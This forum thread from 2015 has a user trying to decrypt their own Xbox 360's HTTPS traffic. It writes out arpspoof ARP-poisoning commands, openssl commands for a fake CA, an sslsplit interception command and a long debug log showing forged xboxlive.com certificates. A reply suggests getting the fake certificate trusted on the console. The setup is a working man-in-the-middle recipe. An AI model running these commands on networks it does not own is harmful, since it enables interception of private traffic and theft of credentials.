precursor Posted March 15, 2015 Posted March 15, 2015 I'm attempting to sniff my Xbox 360's traffic and see the cleartext data sent over HTTPS+SSL. My xbox 360's local IP address is: 192.168.0.22. My attacker Arch Linux box's address is: 192.168.0.18. I have installed dsniff and SSLsplit on attacker box and am performing an ARP cache poisoning attack using the following commands simultaneous in two terminal windows: arpspoof -i enp0s25 -t 192.168.0.1 192.168.0.22 arpspoof -i enp0s25 -t 192.168.0.22 192.168.0.1 I created a fake certificate using the following commands: openssl genrsa -out ca.key 4096 openssl req -new -x509 -days 1826 -key ca.key -out ca.crt I am running sslsplit like this: sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080 When I login to XBL on the 360, I see non-SSL traffic over port 80 in the logs, but the SSL traffic over port 443 has log files with nothing in them (size=0KB). My guess is there is a problem with my certificate, it's not able to verify that it has been signed by a Root CA. Do you know of a way to fix this issue? If that's not the issue, what is and how can I fix it? Thanks for your help. Quote
precursor Posted March 15, 2015 Author Posted March 15, 2015 I forgot to post the debug output from sslsplit: Generated RSA key for leaf certs. SSLsplit 0.4.9 (built 2015-03-10) Copyright (c) 2009-2014, Daniel Roethlisberger <daniel@roe.ch> http://www.roe.ch/SSLsplit Build info: V:FILE Features: -DHAVE_NETFILTER NAT engines: netfilter* tproxy netfilter: IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DST compiled against OpenSSL 1.0.2 22 Jan 2015 (1000200f) rtlinked against OpenSSL 1.0.2 22 Jan 2015 (1000200f) TLS Server Name Indication (SNI) supported OpenSSL is thread-safe with THREADID Using SSL_MODE_RELEASE_BUFFERS SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG compiled against libevent 2.0.22-stable rtlinked against libevent 2.0.22-stable 2 CPU cores detected proxyspecs: - [0.0.0.0]:8080 tcp plain netfilter - [0.0.0.0]:8443 ssl plain netfilter Loaded CA: '/C=US/ST=UT/O=Internet Widgits Pty Ltd/CN=Someone' Using libevent backend 'epoll' Event base supports: edge yes, O(1) yes, anyfd no Inserted events: 0x12054b0 [fd 7] Read Persist 0x1208740 [fd 8] Read Persist 0x12088f0 [fd 9] Read Persist 0x12052e8 [fd 6] Read Persist 0x1208980 [fd 3] Signal Persist 0x1208bc0 [fd 1] Signal Persist 0x1208cf0 [fd 2] Signal Persist 0x1208e20 [fd 13] Signal Persist Initialized 4 connection handling threads Started 4 connection handling threads Starting main event loop. Connecting to [199.117.103.168]:80 tcp [192.168.0.22]:19970 [199.117.103.168]:80 SNI peek: [n/a] [complete] Connecting to [134.170.178.197]:443 ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91 Certificate cache: MISS ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4 ssl [192.168.0.22]:5808 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] Garbage collecting caches started. Garbage collecting caches done. SNI peek: [n/a] [complete] Connecting to [134.170.178.64]:443 ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91 Certificate cache: HIT ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4 ssl [192.168.0.22]:48310 [134.170.178.64]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] SNI peek: [n/a] [complete] Connecting to [65.55.42.33]:443 SNI peek: [n/a] [complete] Connecting to [65.55.42.33]:443 SNI peek: [n/a] [complete] Connecting to [157.56.70.154]:443 ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb Certificate cache: MISS ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c ssl [192.168.0.22]:32910 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] SNI peek: [n/a] [complete] Attempt reuse dst SSL session Connecting to [134.170.178.197]:443 ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb Certificate cache: HIT ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c ssl [192.168.0.22]:29356 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb Certificate cache: HIT ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c ssl [192.168.0.22]:28325 [157.56.70.154]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91 Certificate cache: HIT ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4 ssl [192.168.0.22]:25598 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] SNI peek: [n/a] [complete] Connecting to [172.230.192.227]:443 SNI peek: [n/a] [complete] Attempt reuse dst SSL session Connecting to [65.55.42.33]:443 ===> Original server certificate: Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com Common Names: *.xbox.com/*.xbox.com Fingerprint: fa:36:ff:8e:70:87:3d:52:3b:65:23:43:65:63:36:5e:4f:24:a6:eb Certificate cache: MISS ===> Forged server certificate: Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com Common Names: *.xbox.com/*.xbox.com Fingerprint: 44:4c:08:75:ea:66:05:74:ff:37:de:d0:15:2e:bb:c2:26:e3:12:76 ssl [192.168.0.22]:10291 [172.230.192.227]:443 sni:- crt:*.xbox.com/*.xbox.com origcrt:*.xbox.com/*.xbox.com ===> Original server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb Certificate cache: HIT ===> Forged server certificate: Subject DN: /CN=*.xboxlive.com Common Names: *.xboxlive.com Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c ssl [192.168.0.22]:57485 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] Unclean SSL shutdown. SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket] SSL_free() in state 00000003 = 0003 = SSLOK (SSL negotiation finished successfully) [connect socket] Garbage collecting caches started. Garbage collecting caches done. ^CReceived signal 2 Main event loop stopped. Quote
cooper Posted March 15, 2015 Posted March 15, 2015 My guess would be, set up an https webserver that uses that generated cert. Browse to that site from the X-Box. It should complain about the unverified cert and ask you what to do about it. With any luck, there will be an option there to trust the cert which would add it to the xbox's truststore. From that point on you stand a chance that it'll accept the machine as one from the xboxlive.com domain. But don't be surprised when it still doesn't work. I wouldn't be at all amazed if the xbox has a preset list of certs for its game servers which are kept separately from the regular certs. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.